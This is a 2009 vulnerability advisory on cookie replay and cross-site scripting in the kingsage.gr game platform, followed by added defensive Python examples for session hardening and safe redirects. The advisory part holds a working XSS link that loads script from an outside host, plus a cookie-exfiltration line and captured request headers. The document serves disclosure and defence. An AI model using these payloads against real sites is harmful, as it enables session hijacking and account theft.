Gameforge.de Insecure Cookie / XSS

Gameforge.de Insecure Cookie / XSS
Posted Sep 30, 2009
Authored by mestre rigel

Gameforge.de suffers from an insecure cookie and cross site scripting vulnerabilities.

tags | exploit, vulnerability, xss, insecure cookie handling
SHA-256 | a6ded951baefde88acf0fa36d14d1fbb72bcb401bc4999ef58f8f6778c2ff3e2

Dear all,

I'd like to inform you about a security vulnerability in the gameforge.de gaming
platform.

This vulnerability has been validated only for kingsage.gr (versions 0.1.17,
0.1.18 and 0.1.19 - latest) but might affect all games developed on the same
gaming platform (e.g. ikariam, gladiatus, katsuro, battleknight, bitefight,
etc.).

=========================== Authentication bypass using hashed values ====================

After the initial login to the game, all subsequent requests (plain HTTP
GET/POST) look similar to this:

GET http://s1.kingsage.gr/game.php?village=24482&s=build_main HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg,
application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword,
application/x-shockwave-flash, application/x-ms-application,
application/x-ms-xbap, application/vnd.ms-xpsdocument, application/xaml+xml,
application/x-silverlight, */*
Referer:
http://s1.kingsage.gr/game.php?village=24482&s=build_main&p=2141&build=iron
Accept-Language: el
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR
2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; FDM; .NET CLR
1.1.4322)
Host: s1.kingsage.gr
Cookie: game_hash=cce006dc722ff22ad8a8e5a13fd3c698;
SD_FRAMEWORK_SESSION=0b1f74bebf7875e96338e9d4c6e37d4e; game_user=some.user;
game_pass=347183427615221ca90w24db1039a8cc
Proxy-Connection: Keep-Alive

Among other things, the request carries three critical elements:

village=24482 [The village number - can be found for any user from within
the game]
game_user=some.user [The user's username in plaintext]
game_pass=347183427615221ca90w24db1039a8cc [The MD5 hash of the user's
password]

Because this traffic is plain HTTP and can be sniffed, and because the game's
cookies do not expire, a malicious user who obtains another user's cookies
*once* can bypass authentication and access the application/game as that user
*at any time*.

The steps are as follows:

1. The malicious user uses his/her personal account to enter the game.
2. The malicious user modifies any subsequent request by deleting
SD_FRAMEWORK_SESSION and game_hash from the cookie and POSTs only the
village, game_user and game_pass values that he/she has obtained.

Using this approach, a malicious user can access (at any time) the account of
another user without knowing his/her (plaintext) password.
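The root cause above is that the cookie itself is the credential: a plaintext username plus an unsalted MD5 of the password, with no server-side session that could expire or be revoked. The following added example (mine, not code from the advisory or from Gameforge) models that weak scheme beside a hardened one: random session tokens unrelated to the password, an idle timeout, revocation on logout, and a Set-Cookie header carrying Secure and HttpOnly. The user name "some.user" is taken from the advisory; the password "correct horse", the 30-minute timeout and the PBKDF2 parameters are constructed assumptions.

```python
import hashlib
import hmac
import secrets
import time
from dataclasses import dataclass

# --- Weak scheme, as the advisory describes it ---------------------------------
# Constructed sample account: the cookie carries the username in plaintext and an
# unsalted MD5 of the password ("correct horse" is a constructed password).
WEAK_USERS = {"some.user": hashlib.md5(b"correct horse").hexdigest()}


def weak_cookie_for(user: str, password: str) -> dict:
    """Build the kind of cookie the advisory shows (game_user + game_pass)."""
    return {"game_user": user, "game_pass": hashlib.md5(password.encode()).hexdigest()}


def weak_is_authenticated(cookie: dict) -> bool:
    """Accept game_user + game_pass as proof of identity on every request.
    The pair is a static credential: a copy works forever, from any client,
    and there is no server-side state that could expire or revoke it."""
    expected = WEAK_USERS.get(cookie.get("game_user"))
    return expected is not None and hmac.compare_digest(expected, cookie.get("game_pass", ""))


# --- Hardened scheme: random, expiring, revocable server-side sessions ---------
@dataclass
class Session:
    user: str
    expires_at: float
    revoked: bool = False


class SessionStore:
    TTL = 30 * 60  # idle timeout in seconds (assumption: 30 minutes)

    def __init__(self):
        # password verifiers are per-user salted PBKDF2 digests, not reversible MD5
        self._users = {"some.user": self._new_verifier("correct horse")}
        self._sessions = {}

    @staticmethod
    def _pbkdf2(password: str, salt: bytes) -> bytes:
        return hashlib.pbkdf2_hmac("sha256", password.encode(), salt, 100_000)

    def _new_verifier(self, password: str):
        salt = secrets.token_bytes(16)
        return salt, self._pbkdf2(password, salt)

    def _verify(self, user: str, password: str) -> bool:
        rec = self._users.get(user)
        if rec is None:
            return False
        salt, digest = rec
        return hmac.compare_digest(digest, self._pbkdf2(password, salt))

    def login(self, user: str, password: str, now=None):
        """Verify the password; on success mint a random token with no relation
        to the password, so a stolen token never reveals the password itself."""
        now = time.time() if now is None else now
        if not self._verify(user, password):
            return None
        token = secrets.token_urlsafe(32)
        self._sessions[token] = Session(user, now + self.TTL)
        return token

    def set_cookie_header(self, token: str) -> str:
        """Secure: never sent over plain HTTP (defeats sniffing).
        HttpOnly: invisible to document.cookie (limits the XSS theft path).
        Max-Age: the browser discards the cookie after the timeout."""
        return (f"Set-Cookie: session={token}; Secure; HttpOnly; "
                f"SameSite=Lax; Max-Age={self.TTL}")

    def authenticate(self, token: str, now=None):
        """Return the user for a live token, or None if unknown, revoked or expired."""
        now = time.time() if now is None else now
        s = self._sessions.get(token)
        if s is None or s.revoked or now >= s.expires_at:
            return None
        s.expires_at = now + self.TTL  # sliding expiry on activity
        return s.user

    def logout(self, token: str) -> None:
        """Revoke a token server-side; a copy of it stops working immediately."""
        s = self._sessions.get(token)
        if s is not None:
            s.revoked = True


if __name__ == "__main__":
    store = SessionStore()
    tok = store.login("some.user", "correct horse", now=0.0)
    print(store.set_cookie_header(tok))
    print("after 10 min:", store.authenticate(tok, now=600.0))
    print("after 45 min idle:", store.authenticate(tok, now=600.0 + 45 * 60))
```

The weak check succeeds for any copy of the cookie at any later time, which is exactly the replay the advisory describes; the hardened store refuses a token once it has idled past TTL or been logged out, and because the token is random, changing the password or rotating sessions invalidates everything an eavesdropper captured.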

=========================== Vulnerability Impact (Correlated with Cross Site Scripting) =============

The existence of cross site scripting in the gaming platform raises the impact
of the vulnerability:

As an example, if malicious user [A] sends user [B] a message like this:

[url]http://s1.kingsage.gr/redir.php?url=%3CSCRIPT%20SRC=http://www.stormloader.com/users/hakin/kingsagegr.js%3E%3C/SCRIPT%3E[/url]

*from within the game's messaging functionality*

then user [A] is able to inject/include malicious JavaScript code [<SCRIPT
SRC=http://../maliciouscode.js></SCRIPT>] in order to steal user [B]'s cookie,
which contains all the sensitive information needed for the attack described
in the first part.

(This can be accomplished using e.g. document.location='
http://user_a_controlled_site?cookie='+document.cookie;
in maliciouscode.js)

Kind regards,

mestre.rigel
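The XSS in the advisory lives in a redirect endpoint (redir.php) that reflects its url parameter into the page without encoding. The following added example (mine, not the platform's code, which the advisory does not show) models that reflection beside a hardened version that allowlists the redirect host and HTML-escapes the value before emitting it. The host s1.kingsage.gr is taken from the advisory; the allowlist, the page template and the example.invalid test payload are constructed assumptions.

```python
import html
from urllib.parse import urlsplit

# Assumption: the only hosts the game should ever redirect to are its own.
ALLOWED_REDIRECT_HOSTS = {"s1.kingsage.gr"}

PAGE = '<html><body>Redirecting to <a href="{0}">{0}</a></body></html>'


def vulnerable_redirect_page(url: str) -> str:
    """Models the behaviour the advisory describes: the url parameter is
    reflected into the page unencoded, so markup in it becomes part of the
    game's own origin and any script it carries runs there."""
    return PAGE.format(url)


def is_allowed_redirect(url: str) -> bool:
    """Accept only absolute http(s) URLs whose host is on the allowlist.
    Anything that does not parse as such (including the advisory's payload,
    which has no valid scheme) is rejected before it reaches the template."""
    try:
        parts = urlsplit(url)
    except ValueError:
        return False
    return parts.scheme in ("http", "https") and parts.hostname in ALLOWED_REDIRECT_HOSTS


def safe_redirect_page(url: str) -> str:
    """Allowlist the destination, then HTML-escape it before it is emitted.
    Escaping alone neutralises the injected markup; the allowlist additionally
    closes the open-redirect use of the endpoint."""
    if not is_allowed_redirect(url):
        raise ValueError("redirect target not on allowlist")
    return PAGE.format(html.escape(url, quote=True))


def contains_script_tag(page: str) -> bool:
    """Crude detector for the demonstration: does raw <script markup survive?"""
    return "<script" in page.lower()


if __name__ == "__main__":
    # constructed payload with the same shape as the one in the advisory
    payload = "<SCRIPT SRC=http://example.invalid/x.js></SCRIPT>"
    print("vulnerable reflects script:", contains_script_tag(vulnerable_redirect_page(payload)))
    print("hardened allows payload:", is_allowed_redirect(payload))
    print(safe_redirect_page("http://s1.kingsage.gr/game.php?village=24482&s=build_main"))
```

Together with an HttpOnly session cookie, this removes both halves of the combined attack: script can no longer be injected through the redirect, and even script injected elsewhere cannot read the session cookie through document.cookie.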